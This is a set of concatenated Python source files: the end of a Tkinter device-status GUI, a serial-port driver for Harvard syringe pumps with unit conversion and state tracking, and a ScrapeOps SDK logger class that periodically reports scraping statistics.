    def printPower(self):
        print(self.ac.statusPower())

    def printConnections(self):
        print(self.ac.statusConnections())

    def printNotifications(self):
        print(self.ac.statusNotifications())

    def printWindows(self):
        print(self.ac.statusWindows())

    def updateValues(self):
        """Re-sync the toggle variables with the device's actual state."""
        #self.updateMsg("Updating values...")
        connStatus = self.ac.statusConnections()
        powerStatus = self.ac.statusPower()
        self.wifiVal.set(connStatus['wifi_enabled'])
        self.blueVal.set(connStatus['bluetooth_enabled'])
        self.lockVal.set(powerStatus['display_off'])
        #self.updateMsg("Values updated")
        # NOTE(review): this reschedules via a worker thread, so the next
        # root.after() call happens off the tkinter main thread — tkinter
        # is not generally thread-safe; confirm this is reliable here.
        self.root.after(self.interval_status, lambda:self.cmd(self.updateValues))
if __name__ == '__main__':
    # Build the Tk root window, attach the GUI and enter the event loop.
    root = tk.Tk()
    app = MainGUI(master=root)
    app.mainloop()
|
pump.py | import serial
import logging
import re
import threading
from time import sleep
def remove_crud(string):
    """Return *string* without useless formatting.

    Strips trailing zeros after a decimal point, any trailing decimal
    point, plus leading zeros and leading/trailing spaces — e.g. the
    padding the pump puts around numbers in its replies.
    """
    cleaned = string.rstrip('0') if '.' in string else string
    return cleaned.lstrip('0 ').rstrip(' .')
def convert_units(val, fromUnit, toUnit):
    """Convert a flowrate value between units.

    Units are strings of the form ``<vol>/<time>`` where the volume part
    is one of ``ml``, ``ul``, ``nl``, ``pl`` and the time part is one of
    ``min``, ``sec``, ``hor`` (the pump's spelling of "hour").  The
    reference unit is ul/min: the *from* factors normalise the value to
    ul/min and the *to* factors then scale it into *toUnit*.

    :param val: flowrate value to convert
    :type val: float
    :param fromUnit: unit to convert from, e.g. ``'ml/min'``
    :type fromUnit: str
    :param toUnit: unit to convert to, e.g. ``'ul/sec'``
    :type toUnit: str
    :return: float
    """
    time_factor_from = 1
    time_factor_to = 1
    vol_factor_to = 1
    vol_factor_from = 1
    if fromUnit[-3:] == "sec":
        time_factor_from = 60
    elif fromUnit[-3:] == "hor":
        # BUGFIX: previously compared the whole string (`fromUnit == "hor"`),
        # which never matched real units like "ml/hor"; use the same
        # suffix comparison as the toUnit branch below.
        time_factor_from = 1 / 60
    if toUnit[-3:] == "sec":
        time_factor_to = 1 / 60
    elif toUnit[-3:] == "hor":
        time_factor_to = 60
    if fromUnit[:2] == "ml":
        vol_factor_from = 1000
    elif fromUnit[:2] == "nl":
        vol_factor_from = 1 / 1000
    elif fromUnit[:2] == "pl":
        vol_factor_from = 1 / 1e6
    if toUnit[:2] == "ml":
        vol_factor_to = 1 / 1000
    elif toUnit[:2] == "nl":
        vol_factor_to = 1000
    elif toUnit[:2] == "pl":
        vol_factor_to = 1e6
    return val * time_factor_from * time_factor_to * vol_factor_from * vol_factor_to
def convert_str_units(abbr):
    """Expand an abbreviated serial unit into its full form.

    Maps the pump's short volume codes (``m``, ``u``, ``p``) and time
    codes (``s``, ``m``, ``h``) to full strings, e.g. ``'u/m'`` becomes
    ``'ul/min'``.

    :param abbr: abbreviated unit
    :type abbr: str
    :return: str
    :raises ValueError: if the time code is not recognised
    """
    time_names = {"s": "sec", "m": "min", "h": "hor"}  # 'hor' matches the pump's spelling
    volume_part = abbr[0] + "l"
    try:
        time_part = time_names[abbr[2]]
    except KeyError:
        raise ValueError("Unknown unit")
    return volume_part + "/" + time_part
class Chain(serial.Serial):
    """Create Chain object.

    Harvard syringe pumps are daisy chained together in a 'pump chain'
    off a single serial port. A pump address is set on each pump. You
    must first create a chain to which you then add Pump objects.

    Chain is a subclass of serial.Serial. Chain creates a serial.Serial
    instance with the required parameters, flushes input and output
    buffers (found during testing that this fixes a lot of problems) and
    logs creation of the Chain. Adapted from pumpy on github.
    """

    def __init__(self, port, baudrate=115200):
        """
        :param port: Port of pump at PC
        :type port: str
        :param baudrate: serial baud rate, defaults to 115200
        :type baudrate: int
        """
        # 8N2 framing, no software flow control, 2 s read timeout.
        serial.Serial.__init__(self, port=port, stopbits=serial.STOPBITS_TWO, parity=serial.PARITY_NONE, bytesize=serial.EIGHTBITS, xonxoff= False, baudrate = baudrate, timeout=2)
        # NOTE(review): flushOutput/flushInput are the deprecated pyserial
        # spellings of reset_output_buffer/reset_input_buffer — confirm the
        # installed pyserial version still provides them.
        self.flushOutput()
        self.flushInput()
        logging.info('Chain created on %s',port)
class Pump:
    """Create Pump object for Harvard Pump.

    Argument:
        Chain: pump chain

    Optional arguments:
        address: pump address. Default is 0.
        name: used in logging. Default is Ultra.
    """

    def __init__(self, chain, address=0, name='Ultra'):
        """
        :param chain: Chain (serial connection) the pump hangs off.
        :param address: pump address on the chain (sent zero-padded to 2 digits).
        :param name: human-readable name used in log messages.
        :raises PumpError: if the pump does not answer or reports an
            unknown state; the serial connection is closed before re-raising.
        """
        self.name = name
        self.serialcon = chain
        self.address = '{0:02.0f}'.format(address)
        self.diameter = None
        self.flowrate = None
        self.targetvolume = None
        self.state = None
        # Query the firmware version to check the pump is OK. The response
        # starts with XXY, where XX is the address and Y is the pump
        # status: ':', '>' or '<' when stopped, running forwards, or
        # running backwards. Confirming the address acts as a check that
        # the pump is connected and working.
        try:
            self.write('ver')
            resp = self.read(17)
            if int(resp[0:2]) != int(self.address):
                raise PumpError('No response from pump at address %s' %
                                self.address)
            if resp[2] == ':':
                self.state = 'idle'
            elif resp[2] == '>':
                self.state = 'infusing'
            elif resp[2] == '<':
                self.state = 'withdrawing'
            else:
                raise PumpError('%s: Unknown state encountered' % self.name)
        except PumpError:
            self.serialcon.close()
            raise
        logging.info('%s: created at address %s on %s', self.name,
                     self.address, self.serialcon.port)

    def __repr__(self):
        # Dump all instance attributes, one per line.
        string = ''
        for attr in self.__dict__:
            string += '%s: %s\n' % (attr, self.__dict__[attr])
        return string

    def write(self, command):
        """ Write serial command to pump.

        The command is prefixed with the pump address and terminated
        with a carriage return before being encoded.

        :param command: command to write
        :type command: str
        """
        self.serialcon.write((self.address + command + '\r').encode())

    def read(self, bytes=5):
        """ Read serial stream from pump.

        :param bytes: number of bytes to read
        :type bytes: int
        :return: str (empty string on read timeout)
        """
        response = self.serialcon.read(bytes)
        # BUGFIX: always return a decoded str. The original returned the
        # raw b'' on timeout but a str otherwise, which made substring
        # checks like `'T*' in resp` raise TypeError for empty replies.
        return response.decode().replace('\n', '')

    def setdiameter(self, diameter):
        """Set syringe diameter (millimetres).

        Pump syringe diameter range is 0.1-35 mm. Note that the pump
        ignores precision greater than 2 decimal places. If more d.p.
        are specificed the diameter will be truncated.

        :param diameter: syringe diameter
        :type diameter: float
        :raises PumpError: if the diameter is out of range or the pump
            reply cannot be interpreted.
        """
        if self.state == 'idle':
            if diameter > 35 or diameter < 0.1:
                raise PumpError('%s: diameter %s mm is out of range' %
                                (self.name, diameter))
            # Truncate to the 2 d.p. the pump actually accepts.
            str_diameter = "%2.2f" % diameter
            # Send command
            self.write('diameter ' + str_diameter)
            resp = self.read(80).splitlines()
            last_line = resp[-1]
            # Pump replies with address and status (:, < or >)
            if (last_line[2] == ':' or last_line[2] == '<' or last_line[2] == '>'):
                # Read the diameter back to check it was set correctly.
                self.write('diameter')
                resp = self.read(45)
                returned_diameter = remove_crud(resp[3:9])
                # Check diameter was set accurately
                if float(returned_diameter) != diameter:
                    logging.error('%s: set diameter (%s mm) does not match diameter'
                                  ' returned by pump (%s mm)', self.name, diameter,
                                  returned_diameter)
                elif float(returned_diameter) == diameter:
                    self.diameter = float(returned_diameter)
                    logging.info('%s: diameter set to %s mm', self.name,
                                 self.diameter)
            else:
                raise PumpError('%s: unknown response to setdiameter' % self.name)
        else:
            print("Please wait until pump is idle.\n")

    def setwithdrawrate(self, flowrate, unit):
        """Set withdraw rate.

        The pump will tell you if the specified flow rate is out of
        range. This depends on the syringe diameter. See Pump manual.

        :param flowrate: withdrawing flowrate
        :type flowrate: float
        :param unit: unit of flowrate. can be [m,u,p]/[h,m,s]
        :type unit: str
        :raises PumpError: if the rate is out of range or the reply is
            not understood.
        """
        if self.state == 'idle':
            self.write('wrate ' + str(flowrate) + ' ' + unit)
            resp = self.read(7)
            if (resp[2] == ':' or resp[2] == '<' or resp[2] == '>'):
                # Flow rate was sent, check it was set correctly
                self.write('wrate')
                resp = self.read(150).splitlines()[0]
                if 'Argument error' in resp:
                    raise PumpError('%s: flow rate (%s %s) is out of range' %
                                    (self.name, flowrate, unit))
                # Slice the echoed value out of the reply: from the first
                # digit of the requested rate up to the "l/" of the unit.
                idx1 = resp.find(str(flowrate)[0])
                idx2 = resp.find("l/")
                returned_flowrate = remove_crud(resp[idx1:idx2-1])
                returned_unit = resp[idx2-1:idx2+5]
                # Normalise to the requested unit before comparing.
                returned_flowrate = convert_units(float(returned_flowrate), returned_unit, convert_str_units(unit))
                if returned_flowrate != flowrate:
                    logging.error('%s: set flowrate (%s %s) does not match'
                                  'flowrate returned by pump (%s %s)',
                                  self.name, flowrate, unit, returned_flowrate, unit)
                elif returned_flowrate == flowrate:
                    self.flowrate = returned_flowrate
                    logging.info('%s: flow rate set to %s uL/min', self.name,
                                 self.flowrate)
            else:
                raise PumpError('%s: unknown response' % self.name)
        else:
            print("Please wait until pump is idle.\n")

    def setinfusionrate(self, flowrate, unit):
        """Set infusion rate.

        The pump will tell you if the specified flow rate is out of
        range. This depends on the syringe diameter. See Pump manual.

        :param flowrate: infusion flowrate
        :type flowrate: float
        :param unit: unit of flowrate. can be [m,u,p]/[h,m,s]
        :type unit: str
        :raises PumpError: if the rate is out of range or the reply is
            not understood.
        """
        if self.state == "idle":
            self.write('irate ' + str(flowrate) + ' ' + unit)
            resp = self.read(17)
            if (":" in resp or "<" in resp or ">" in resp):
                # Flow rate was sent, check it was set correctly
                self.write('irate')
                resp = self.read(150)
                if 'error' in resp:
                    raise PumpError('%s: flow rate (%s %sl) is out of range' %
                                    (self.name, flowrate, unit))
                # Parse "<number> <vol-unit>" out of the echo.
                matches = re.search(r"(\d+\.?\d*) ([mup][l])", resp)
                if matches is None:
                    raise PumpError("Syringe volume could not be found")
                returned_flowrate = matches.group(1)
                returned_unit = matches.group(2)
                returned_flowrate = convert_units(float(returned_flowrate), returned_unit, convert_str_units(unit))
                if returned_flowrate != flowrate:
                    logging.error('%s: set flowrate (%s %s) does not match'
                                  'flowrate returned by pump (%s %s)',
                                  self.name, flowrate, unit, returned_flowrate, unit)
                elif returned_flowrate == flowrate:
                    self.flowrate = returned_flowrate
                    logging.info('%s: flow rate set to %s uL/min', self.name,
                                 self.flowrate)
            else:
                raise PumpError('%s: unknown response' % self.name)
        else:
            print("Please wait until pump is idle.\n")

    def infuse(self):
        """Start infusing pump.

        :raises PumpError: if the pump reports a command error.
        """
        if self.state == 'idle':
            self.write('irun')
            resp = self.read(55)
            if "Command error" in resp:
                error_msg = resp.splitlines()[1]
                # BUGFIX: message was never formatted — PumpError received
                # ('%s: %s', (name, msg)) as two arguments.
                raise PumpError('%s: %s' % (self.name, error_msg))
            # pump doesn't respond to serial commands while infusing
            self.state = "infusing"
            # BUGFIX: the monitor thread was created but never started, so
            # self.state stayed "infusing" forever. Daemon so it cannot
            # block interpreter shutdown.
            monitor = threading.Thread(target=self.waituntilfinished, daemon=True)
            monitor.start()
        else:
            print("Please wait until the pump is idle before infusing.\n")

    def waituntilfinished(self):
        """ Poll the serial stream until the pump reports completion.

        The pump emits 'T*' when the target volume has been reached; the
        state is then reset to idle.

        :return: "finished" once the target notification is seen.
        """
        while self.state == "infusing" or self.state == "withdrawing":
            try:
                resp = self.read(5)
                if 'T*' in resp:
                    self.state = "idle"
                    return "finished"
            except Exception:
                # Reads may fail/time out while the pump is busy; keep polling.
                pass

    def withdraw(self):
        """Start withdrawing pump.

        :raises PumpError: if the pump reports a command error.
        """
        if self.state == 'idle':
            self.write('wrun')
            resp = self.read(85)
            if "Command error" in resp:
                error_msg = resp.splitlines()[1]
                # BUGFIX: same missing '%'-formatting as in infuse().
                raise PumpError('%s: %s' % (self.name, error_msg))
            # pump doesn't respond to serial commands while withdrawing
            self.state = "withdrawing"
            # BUGFIX: start the monitor thread (was created but never started).
            monitor = threading.Thread(target=self.waituntilfinished, daemon=True)
            monitor.start()
        else:
            print("Please wait until the pump is idle before withdrawing.\n")

    def settargetvolume(self, targetvolume, unit):
        """Set target volume.

        The pump will tell you if the specified target volume is out of
        range. This depends on the syringe. See Pump manual.

        :param targetvolume: target volume
        :type targetvolume: float
        :param unit: unit of targetvolume. Can be [m,u,p]
        :type unit: str
        :raises PumpError: if the volume could not be set or the reply is
            not understood.
        """
        if self.state == 'idle':
            self.write('tvolume ' + str(targetvolume) + ' ' + unit)
            resp = self.read(7)
            # NOTE(review): unlike the other setters, the status characters
            # in `resp` are not checked here (`if True:` in the original) —
            # kept as-is to preserve behaviour; confirm against the pump's
            # actual tvolume reply before tightening.
            if True:
                # Target volume was sent, check it was set correctly
                self.write('tvolume')
                resp = self.read(150)
                if 'Target volume not set' in resp:
                    raise PumpError('%s: Target volume (%s %s) could not be set' %
                                    (self.name, targetvolume, unit))
                matches = re.search(r"(\d+\.?\d*) ([mup][l])", resp)
                if matches is None:
                    raise PumpError("Syringe volume could not be found")
                returned_targetvolume = matches.group(1)
                returned_unit = matches.group(2)
                # convert_units works on flowrates, so compare as "<unit>/min".
                returned_targetvolume = convert_units(float(returned_targetvolume), returned_unit + "/min", convert_str_units(unit + "/min"))
                if returned_targetvolume != targetvolume:
                    logging.error('%s: set targetvolume (%s %s) does not match'
                                  'targetvolume returned by pump (%s %s)',
                                  self.name, targetvolume, unit, returned_targetvolume, unit)
                elif returned_targetvolume == targetvolume:
                    self.targetvolume = returned_targetvolume
                    logging.info('%s: target volume set to %s %s', self.name,
                                 self.targetvolume, convert_str_units(unit + "/min")[:2])
            else:
                raise PumpError('%s: unknown response' % self.name)
        else:
            print("Please wait until pump is idle.\n")

    def gettargetvolume(self):
        """Get target volume.

        :return: str of the form "<value> <unit>"
        :raises PumpError: if no target volume is set or the reply cannot
            be parsed.
        """
        self.write('tvolume')
        resp = self.read(150)
        if 'Target volume not set' in resp:
            raise PumpError('%s: Target volume not be set' %
                            self.name)
        matches = re.search(r"(\d+\.?\d*) ([mup][l])", resp)
        if matches is None:
            raise PumpError("Target value could not be found")
        returned_targetvolume = matches.group(1)
        returned_unit = matches.group(2)
        rtn_str = returned_targetvolume + " " + returned_unit
        return rtn_str

    def setsyringevolume(self, vol, unit):
        """ Sets syringe volume.

        :param vol: volume of syringe
        :param unit: volume unit, can be [m, u, p]
        :type vol: float
        :type unit: str
        :raises PumpError: if the reply is not understood.
        """
        if self.state == 'idle':
            self.write('svolume ' + str(vol) + ' ' + unit + 'l')
            resp = self.read(10)
            if (resp[-1] == ':' or resp[-1] == '<' or resp[-1] == '>'):
                # Volume was sent, check it was set correctly
                volume_str = self.getsyringevolume()
                returned_volume = volume_str[:-3]
                returned_unit = volume_str[-2:]
                # convert_units works on flowrates, so compare as "<unit>/min".
                returned_volume = convert_units(float(returned_volume), returned_unit + "/min", convert_str_units(unit + "/min"))
                if returned_volume != vol:
                    logging.error('%s: set syringe volume (%s %s) does not match'
                                  'syringe volume returned by pump (%s %s)',
                                  self.name, vol, unit, returned_volume, unit)
                elif returned_volume == vol:
                    self.syringevolume = returned_volume
                    logging.info('%s: syringe volume set to %s %s', self.name,
                                 self.syringevolume, convert_str_units(unit + "/min")[:2])
            else:
                raise PumpError('%s: unknown response' % self.name)
        else:
            print("Please wait until pump is idle.\n")

    def getsyringevolume(self):
        """ Gets syringe volume.

        :return: str of the form "<value> <unit>"
        :raises PumpError: if the reply cannot be parsed.
        """
        self.write('svolume')
        resp = self.read(60)
        matches = re.search(r"(\d+\.?\d*) ([mup][l])", resp)
        if matches is None:
            raise PumpError("Syringe volume could not be found")
        returned_volume = matches.group(1)
        returned_unit = matches.group(2)
        rtn_str = returned_volume + " " + returned_unit
        return rtn_str

    def stop(self):
        """Stop pump.

        To be used in an emergency as pump should stop if target is reached.

        :raises PumpError: if the pump does not acknowledge the stop.
        """
        self.write('stop')
        resp = self.read(5)
        # Acknowledgement is the address followed by the idle marker ':'.
        if resp[:3] != self.address + ":":
            raise PumpError('%s: unexpected response to stop' % self.name)
        else:
            logging.info('%s: stopped', self.name)
            self.state = "idle"

    def cvolume(self):
        """ Clears both withdrawn and infused volume """
        self.civolume()
        self.cwvolume()

    def civolume(self):
        """ Clears infused volume """
        self.write('civolume')

    def ctvolume(self):
        """ Clears target volume """
        self.write('ctvolume')

    def cwvolume(self):
        """ Clears withdrawn volume """
        self.write('cwvolume')

    def ivolume(self):
        """ Displays infused volume

        :return: str of the form "<value> <unit>"
        :raises PumpError: if the reply cannot be parsed.
        """
        self.write('ivolume')
        resp = self.read(55)
        matches = re.search(r"(\d+\.?\d*) ([mup][l])", resp)
        if matches is not None:
            return matches.group(1) + " " + matches.group(2)
        else:
            raise PumpError('%s: Unknown answer received' % self.name)

    def wvolume(self):
        """ Displays withdrawn volume

        :return: str of the form "<value> <unit>"
        :raises PumpError: if the reply cannot be parsed.
        """
        self.write('wvolume')
        resp = self.read(55)
        matches = re.search(r"(\d+\.?\d*) ([mup][l])", resp)
        if matches is not None:
            return matches.group(1) + " " + matches.group(2)
        else:
            raise PumpError('%s: Unknown answer received' % self.name)
class Pump2000(Pump):
    """ Create pump object for Harvard PhD 2000 pump.

    Uses the PhD 2000's three-letter command set (VER, RUN, REV, STP, ...)
    instead of the Ultra's word commands; inherits write/read from Pump.
    """

    def __init__(self, chain, address=00, name='PhD2000'):
        """
        :param chain: Chain (serial connection) the pump hangs off.
        :param address: pump address on the chain.
        :param name: human-readable name used in log messages.
        """
        self.name = name
        self.serialcon = chain
        self.address = '{0:02.0f}'.format(address)
        self.diameter = None
        self.flowrate = None
        self.targetvolume = None
        self.state = None
        """Query model and version number of firmware to check pump is
        OK. Responds with a load of stuff, but the last three characters
        are XXY, where XX is the address and Y is pump status. :, > or <
        when stopped, running forwards, or running backwards. Confirm
        that the address is correct. This acts as a check to see that
        the pump is connected and working."""
        try:
            self.write('VER')
            resp = self.read(17)
            # The PhD 2000 identifies itself with 'PHD' in the VER reply.
            if 'PHD' not in resp:
                raise PumpError('No response from pump at address %s' %
                                self.address)
            # Last character of the reply is the status marker.
            if resp[-1] == ':':
                self.state = 'idle'
            elif resp[-1] == '>':
                self.state = 'infusing'
            elif resp[-1] == '<':
                self.state = 'withdrawing'
            elif resp[-1] == '*':
                self.state = 'stalled'
            else:
                raise PumpError('%s: Unknown state encountered' % self.name)
        except PumpError:
            self.serialcon.close()
            raise
        logging.info('%s: created at address %s on %s', self.name,
                     self.address, self.serialcon.port)

    def waituntilfinished(self):
        """ Try to read pump state and return it.

        The PhD 2000 emits '*' (stall/target marker) when a run finishes.
        """
        while self.state == "infusing" or self.state == "withdrawing":
            try:
                resp = self.read(5)
                if '*' in resp:
                    self.state = "idle"
                    return "finished"
            except:
                # Ignore read timeouts while the pump is busy.
                pass

    def run(self):
        # Start the pump in its current direction.
        self.write('RUN')
        resp = self.read(17)
        self._errorcheck(resp)
        self.state = 'infusing'

    def rev(self):
        # Reverse direction and run.
        self.write('REV')
        resp = self.read(17)
        self._errorcheck(resp)
        self.state = 'withdrawing'

    def infuse(self):
        # NOTE(review): run() unconditionally sets state to 'infusing'
        # before this check, so the stop/rev branch looks unreachable as
        # written — confirm intended direction-correction behaviour.
        self.run()
        if self.state == 'withdrawing':
            self.stop()
            self.rev()

    def withdraw(self):
        # NOTE(review): same concern as infuse() — rev() sets state to
        # 'withdrawing' before the check below.
        self.rev()
        if self.state == 'infusing':
            self.stop()
            self.run()

    def stop(self):
        self.write('STP')
        resp = self.read(17)
        self._errorcheck(resp)
        # Give the pump a moment, then verify via the state decoded above.
        sleep(0.1)
        if self.state == 'infusing' or self.state == 'withdrawing':
            raise PumpError('%s: Pump could not be stopped.' % self.name)

    def _errorcheck(self, resp):
        """Decode the status marker at the end of a reply into self.state.

        :raises PumpError: if the marker is not one of : > < *.
        """
        if resp[-1] == ':':
            self.state = 'idle'
        elif resp[-1] == '>':
            self.state = 'infusing'
        elif resp[-1] == '<':
            self.state = 'withdrawing'
        elif resp[-1] == '*':
            self.state = 'stalled'
        else:
            raise PumpError('%s: Unknown state encountered' % self.name)

    def clear_accumulated_volume(self):
        self.write('CLV')
        resp = self.read(17)
        self._errorcheck(resp)

    def clear_target_volume(self):
        self.write('CLT')
        resp = self.read(17)
        self._errorcheck(resp)

    def set_rate(self, flowrate, units):
        """Set the flow rate.

        :param flowrate: rate value
        :param units: one of 'm/m' (ml/min), 'u/m' (ul/min),
            'm/h' (ml/h), 'u/h' (ul/h)
        :raises PumpError: for an unknown unit string.
        """
        flowrate_str = "%4.4f" %flowrate
        if units == 'm/m':
            write_str = 'MLM'
        elif units == 'u/m':
            write_str = 'ULM'
        elif units == 'm/h':
            write_str = 'MLH'
            # NOTE(review): rate_units is only recorded for this one unit —
            # confirm whether the other branches should set it too.
            self.rate_units = "ml/h"
        elif units == 'u/h':
            write_str = 'ULH'
        else:
            raise PumpError('%s: Unknown unit specified' % self.name)
        self.write(write_str + flowrate_str)
        resp = self.read(17)
        self._errorcheck(resp)

    def setdiameter(self, diameter):
        # Syringe diameter in millimetres.
        self.write('MMD' + str(diameter))
        resp = self.read(17)
        self._errorcheck(resp)

    def settargetvolume(self, volume):
        """ Set target volume in mL. """
        self.write('MLT' + str(volume))
        resp = self.read(17)
        self._errorcheck(resp)

    def getdiameter(self):
        """Return the syringe diameter as "<value> mm"."""
        self.write('DIA')
        resp = self.read(17)
        self._errorcheck(resp)
        matches = re.search(r"(\d+\.?\d*)", resp)
        if matches is not None:
            return matches.group(1) + " mm"
        else:
            raise PumpError('%s: Unknown answer received' % self.name)

    def getrate(self):
        """Return the current rate with its unit (queried via RNG)."""
        self.write('RAT')
        resp = self.read(19)
        self._errorcheck(resp)
        matches = re.search(r"(\d+\.?\d*)", resp)
        if matches is not None:
            self.write('RNG')
            resp = self.read(17)
            self._errorcheck(resp)
            return matches.group(1) + " " + resp[:4]
        else:
            raise PumpError('%s: Unknown answer received' % self.name)

    def ivolume(self):
        """Return the accumulated (infused) volume as "<value> ml"."""
        self.write('VOL')
        resp = self.read(17)
        self._errorcheck(resp)
        matches = re.search(r"(\d+\.?\d*)", resp)
        if matches is not None:
            return matches.group(1) + " " + "ml"
        else:
            raise PumpError('%s: Unknown answer received' % self.name)

    def gettargetvolume(self):
        """Return the target volume as "<value> ml"."""
        self.write('TAR')
        resp = self.read(17)
        self._errorcheck(resp)
        matches = re.search(r"(\d+\.?\d*)", resp)
        if matches is not None:
            return matches.group(1) + " " + "ml"
        else:
            raise PumpError('%s: Unknown answer received' % self.name)
class PumpError(Exception):
    """Raised when a pump reports an error or an unexpected response."""
    pass
scrapeops_logger.py | import logging
import threading
import time
from scrapeops_python_logger.core.controllers import SDKControllers
from scrapeops_python_logger.core.error_logger import TailLogger
from scrapeops_python_logger.stats.logger import StatsLogger
from scrapeops_python_logger.normalizer.request_response import SOPSResponse
from scrapeops_python_logger.stats.model import OverallStatsModel, PeriodicStatsModel
from scrapeops_python_logger.exceptions import ScrapeOpsMissingAPIKey, ScrapeOpsInvalidAPIKey
from scrapeops_python_logger.utils import utils
from scrapeops_python_logger.core.api import SOPSRequest
import atexit
class ScrapeOpsLogger(SDKControllers, StatsLogger):
    """Main ScrapeOps SDK entry point.

    Combines the SDK controllers and the stats logger: attaches a tail
    handler to capture error/warning log records, registers the job with
    the ScrapeOps API, and runs a background daemon thread that
    periodically aggregates and ships scraping stats. Final stats are
    flushed via an atexit hook.
    """

    def __init__(self,
                scrapeops_api_key=None,
                spider_name=None,
                job_name=None,
                job_version=None,
                custom_groups=None,
                logger_name=None,

                ## SOPS
                sop_debug=False,
                sops_endpoint=None):
        """
        :param scrapeops_api_key: API key for the ScrapeOps dashboard.
        :param spider_name: name of the spider being monitored.
        :param job_name: job group name shown in the dashboard.
        :param job_version: version label for the job group.
        :param custom_groups: extra user-defined grouping labels.
        :param logger_name: logger to attach the error-tail handler to;
            the root logger is used when None.
        :param sop_debug: enable SDK debug mode.
        :param sops_endpoint: override for the ScrapeOps API endpoint.
        """
        SDKControllers.__init__(self)
        StatsLogger.__init__(self)

        ## Error/Warning Logger
        # Tail handler records recent log output for error reporting.
        self.tail = TailLogger()
        log_handler = self.tail.log_handler
        if(logger_name != None):
            logging.getLogger(logger_name).addHandler(log_handler)
        else:
            logging.getLogger().addHandler(log_handler)

        #Periodic Details
        self.daemon_thread = None
        self.last_run = 0              # seconds accumulated since last tick
        self.thread_active = True      # flag polled by the scheduler loop
        self.sleep_frequency = 0.5     # scheduler polling interval (seconds)

        ## Job Details
        self.spider_name = spider_name
        self.job_group_name = job_name
        self.job_group_version = job_version
        self.job_custom_groups = custom_groups

        ## Logger Setup Data
        self._scrapeops_api_key = scrapeops_api_key
        self._scrapeops_debug_mode = sop_debug
        SOPSRequest.set_sops_endpoint(sops_endpoint)
        SOPSRequest.set_sops_api_key(scrapeops_api_key)
        self.start_sdk()

    def start_sdk(self, spider=None, crawler=None):
        """Validate the API key, register the job and start monitoring.

        :raises ScrapeOpsMissingAPIKey: when no/invalid key is configured
            (an invalid key only deactivates the SDK; a missing key raises).
        """
        self.start_time = self.period_start_time = utils.current_time()
        self._scrapeops_job_start = utils.current_time()
        if self.check_api_key_present():
            self.initialize_SDK()
            self.send_setup_request()
            if self._scrapeops_api_key_valid:
                self.spider_open_stats()
                self.start_periodic_monitor()
                # Ensure final stats are flushed on interpreter exit.
                atexit.register(self.close_sdk)
            else:
                print("ScrapeOps API Key Invalid")
                err = ScrapeOpsInvalidAPIKey()
                self.deactivate_sdk(reason='invalid_api_key', error=err)
        else:
            print("ScrapeOps API Key Missing or Incorrect")
            err = ScrapeOpsMissingAPIKey()
            self.deactivate_sdk(reason='no_api_key', error=err)
            raise err

    #PERIODIC 1st function
    def start_periodic_monitor(self):
        # Daemon thread so the monitor never blocks interpreter shutdown.
        self.daemon_thread = threading.Thread(target=self.scheduler_controller, daemon=True)
        self.daemon_thread.start()

    #PERIODIC 2nd function
    def scheduler_controller(self):
        """Background loop: every `sleep_frequency` seconds, check whether
        a periodic stats report is due and send it."""
        while self.thread_active == True:
            time.sleep(self.sleep_frequency)
            self.last_run += self.sleep_frequency

            #send stats
            period_time = utils.current_time()
            # Report when runtime lands on a multiple of the current
            # reporting frequency.
            if self.get_runtime(time=period_time) % self.get_periodic_frequency() == 0:
                self.period_finish_time = utils.current_time()

                if self.sdk_enabled():
                    self.spider_close_stats()
                    self.aggregate_stats(crawler=None, middleware=False)
                    self.send_stats(periodic_stats=PeriodicStatsModel._periodic_stats, overall_stats=OverallStatsModel._overall_stats, stats_type='periodic', reason='periodic')
                    self.reset_periodic_stats()
                    self.period_start_time = utils.current_time()
                    self.inc_value(OverallStatsModel._overall_stats, 'periodic_runs')
                elif self.periodic_monitor_active():
                    # SDK was deactivated mid-run: stop the monitor loop.
                    self.close_periodic_monitor()

    def close_periodic_monitor(self):
        # Signal the scheduler loop to exit on its next iteration.
        self.thread_active = False

    def get_periodic_frequency(self):
        """Return the current reporting frequency (seconds) and update
        ``self.period_count`` with the number of periods elapsed.

        With no frequency schedule, the fixed ``_period_frequency`` is
        used; otherwise the schedule rows (each with 'total_time' and
        'periodic_frequency') define ramped frequencies over the runtime.
        """
        self.period_count = 0
        runtime = self.get_runtime()
        if self._period_freq_list is None:
            self.period_count = int(runtime//self._period_frequency)
            return self._period_frequency
        for index, row in enumerate(self._period_freq_list):
            if runtime > int(row.get('total_time')):
                # Fully elapsed schedule band: count all of its periods.
                if index == 0:
                    period_time = row.get('total_time')
                else:
                    period_time = row.get('total_time') - self._period_freq_list[index - 1].get('total_time')
                self.period_count += int(period_time/row.get('periodic_frequency'))
            if runtime <= int(row.get('total_time')):
                # Current band: adopt its frequency and count the partial span.
                self._period_frequency = row.get('periodic_frequency')
                if index == 0:
                    diff = runtime
                else:
                    diff = runtime - int(self._period_freq_list[index - 1].get('total_time'))
                self.period_count += int(diff//self._period_frequency)
                return self._period_frequency
        return self._period_frequency

    def get_runtime(self, time=None):
        # Seconds since the job started; `time` lets callers reuse a
        # timestamp taken earlier in the same tick.
        if time is None:
            return utils.current_time() - self._scrapeops_job_start
        return time - self._scrapeops_job_start

    def close_sdk(self):
        """Flush final stats and stop the periodic monitor (atexit hook)."""
        if self.sdk_enabled():
            self.period_finish_time = utils.current_time()
            self.spider_close_stats("Finished")
            self.send_stats(periodic_stats=PeriodicStatsModel._periodic_stats, overall_stats=OverallStatsModel._overall_stats, stats_type='finished', reason='finished')
            self.close_periodic_monitor()
            self.display_overall_stats()

    def log_request(self, request_response_object=None):
        # Normalise domain/proxy info, then record request stats.
        if self.sdk_enabled():
            self.request_response_middleware.normalise_domain_proxy_data(request_response_object)
            self.generate_request_stats(request_response_object)

    def log_response(self, request_response_object=None):
        # Run the full response middleware, then record response stats.
        if self.sdk_enabled():
            self.request_response_middleware.process(request_response_object)
            self.generate_response_stats(request_response_object)

    def item_scraped(self, response=None, item=None):
        # Validate and count a successfully scraped item.
        if self.sdk_enabled():
            if isinstance(response, SOPSResponse):
                self.request_response_middleware.normalise_domain_proxy_data(response)
                self.item_validation_middleware.validate(response, item)
            self.generate_item_stats(response, signal='item_scraped')

    def item_dropped(self, response=None, item=None, message=None):
        # Count an item dropped by the pipeline.
        if self.sdk_enabled():
            if isinstance(response, SOPSResponse):
                self.request_response_middleware.normalise_domain_proxy_data(response)
            self.generate_item_stats(response, signal='item_dropped')
            ## log the dropped item

    def item_error(self, response=None, item=None, message=None, error=None):
        # Count an item that raised an error during processing.
        if self.sdk_enabled():
            if isinstance(response, SOPSResponse):
                self.request_response_middleware.normalise_domain_proxy_data(response)
            self.generate_item_stats(response, signal='item_error')
